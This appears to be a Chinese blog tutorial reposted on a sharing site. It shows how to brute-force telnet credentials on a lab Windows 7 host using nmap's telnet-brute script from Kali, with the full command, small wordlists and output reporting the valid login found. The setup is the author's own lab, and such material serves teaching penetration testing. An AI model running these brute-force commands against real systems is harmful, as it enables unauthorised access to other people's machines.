首页 > 其他分享 >kali nmap 扫描密码

kali nmap 扫描密码

时间:2023-11-29 13:45:15浏览次数:57  
标签:23 nmap kali 扫描 brute telnet lst 主机

【20171115中】nmap 使用脚本爆破telnet密码

 

  今天老黑走出了低谷,设置了惩罚机制后效率提升了很多,现在写一个使用nmap检测目标主机漏洞和利用漏洞的文章,话不多说,直接开始!

0x01:环境介绍

  主机A:系统 - kali2017,IP - 192.168.1.104

  主机B:系统 - win7x64,IP - 192.168.1.103

  使用主机A扫描并攻入主机B

0x02:确认主机B开启了telnet的23端口

  主机B没有开启,我自己开启一下。

  s1:控制面板 -> 程序 -> 打开或关闭windows程序 -> 选中下图选项框,点击确认后重启系统。

  s2:确认计算机telnet服务是否已经开启。打开计算机右击 -> 管理 -> 服务和应用程序 -> 服务 -> 找到Telnet服务,并将其开启服务和设置自动

0x03:在主机A扫描确认主机B是否开启了23端口

  

0x04:进行爆破

  s1:参考官网了解,爆破命令如下

nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s <target>

  s2:制造自己的myusers.lst和mypwds.lst

    老黑将自己的账号AAAA放在myusers.lst中,如下:

    

1 2 3 4 AAAA AA22 ASDFSA SDSDD

    将自己的密码BBBB放在mypwds.lst中,如下:

BBBB
BB23
DFASDFA
SADFAA

    根据主机A的环境,调整命令,如下:

nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

  s3:执行命令,等待结果

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 root@l:~# nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103   Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-15 18:18 CST Nmap scan report for promote.cache-dns.local (192.168.1.103) Host is up (0.091s latency).   PORT   STATE SERVICE 23/tcp open  telnet | telnet-brute: |   Accounts: |     AAAA:BBBB - Valid credentials |_  Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0 MAC Address: XXXXXXXXXXXXX (xxxxxxxxxxxx.)   Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds

  

 

0x05:telnet登陆主机B,WELL DONE!

标签:23,nmap,kali,扫描,brute,telnet,lst,主机
From: https://www.cnblogs.com/huangweihao/p/17864653.html

相关文章

  • Kali安装JDK8和JDK17并切换
    Kali安装JDK8和JDK17切换在进行漏洞复现的时候,发现kali中JDK为17,所以一些POC用不了,需要JDK低版本安装JDK1.8[下载地址]mkdir-p/usr/local/javacpjdk-8u251-linux-x64.tar.gz/usr/local/javatar-zxvfjdk-8u251-linux-x64.tar.gz配置环境变量vim/etc/profile#......
  • 安全防护-漏洞扫描
    针对企业内部的IT财物进行缝隙扫描以辨认可能使企业面对网络要挟的安全缝隙,以高性价比的价格提供全面掩盖性的服务包括(现场/长途)扫描(内网/外网)财物财物服务。产品优势:1、缝隙办理渠道支撑的财物类型多|掩盖面最广|最全的缝隙库|监管机构认可度最高,Tenable.SC是业......
  • Spring Boot 关闭 Actuator ,满足安全工具扫描
    应用被安全工具,扫描出漏洞信息【MSS】SpringBootActuator敏感接口未授权访问漏洞(Actuator)事件发现通告:发现时间:2023-11-2519:47:17攻击时间:2023-11-2518:56:44事件/告警类型:非授权访问/权限绕过告警设备:APT攻击IP:xxx被攻击IP/资产信息:xxx告警描述:SpringBootActuator......
  • 扫描器及常见爬虫特征
    NessusNessus扫描器的特征信息同样在请求的URL,Headers,Body三项里URL:nessusNessusHeaders:x_forwarded_for:nessusreferer:nessushost:nessusBody:nessusNessusAWVSAWVS扫描器在请求的URL,Headers,Body三项里随机包含了能代表自己的特征信息URL:acunetix-wvs......
  • WEB安全漏洞扫描及其审计
    一.实验目的(1)掌握网络漏洞扫描的原理和方法(2)复习Nmap的使用命令和kali的使用(3)学习开源扫描工具Nikto的使用phpstudy软件下载地址链接:https://pan.baidu.com/s/1g5nvonNm-p57kv-L68q9AQ?pwd=poza提取码:poza二.实验环境Windows7虚拟机一台,kali虚拟机一台 三.实验工具VMW......
  • Nmap端口扫描实验
    一.实验目的了解网络扫描的基本概念和原理掌握市面上主流扫描工具Nmap的使用方法注意:本实验在虚拟机上面进行,仅用作交流学习,不可用于破坏他人计算机等一切非法活动,否则后果自负!二.实验环境Kali、windows7 三.实验工具Nmap扫描工具VMware上安装的攻击主机kali一台,将......
  • Kali使用Aircrack-ng进行暴力破译WIFI密码
    @TOC一、什么是Aircrack-ngAircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破译。Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据。该程序可运行在Linux......
  • web目录扫描工具——dirpro
    工具可自行在GitHub上下载:https://github.com/coleak2021/dirprodirpro是一个绿色版工具,无需安装。下载完成后直接解压出来,通过Python运行即可。示例:利用dirpro工具扫描百度网址目录cdD:\*\dirpro-mainpythondirpro.py-uhttps://www.baidu.com/ 参数解析:-u......
  • C++ LibCurl实现Web隐藏目录扫描
    LibCurl是一个开源的免费的多协议数据传输开源库,该框架具备跨平台性,开源免费,并提供了包括HTTP、FTP、SMTP、POP3等协议的功能,使用libcurl可以方便地进行网络数据传输操作,如发送HTTP请求、下载文件、发送电子邮件等。它被广泛应用于各种网络应用开发中,特别是涉及到数据传输的场景。......
  • SonarQube系列-通过配置扫描分析范围,聚焦关键问题
    在许多情况下,你可能不希望分析项目中每个源文件的各个方面。例如,项目可能包含生成的代码、库中的源代码或有意复制的代码。在这种情况下,跳过这些文件分析的部分或全部方面是有意义的,从而消除干扰并将焦点缩小到真正重要的问题上。如果SonarQube的结果不相关,那么没有人会想要使用它......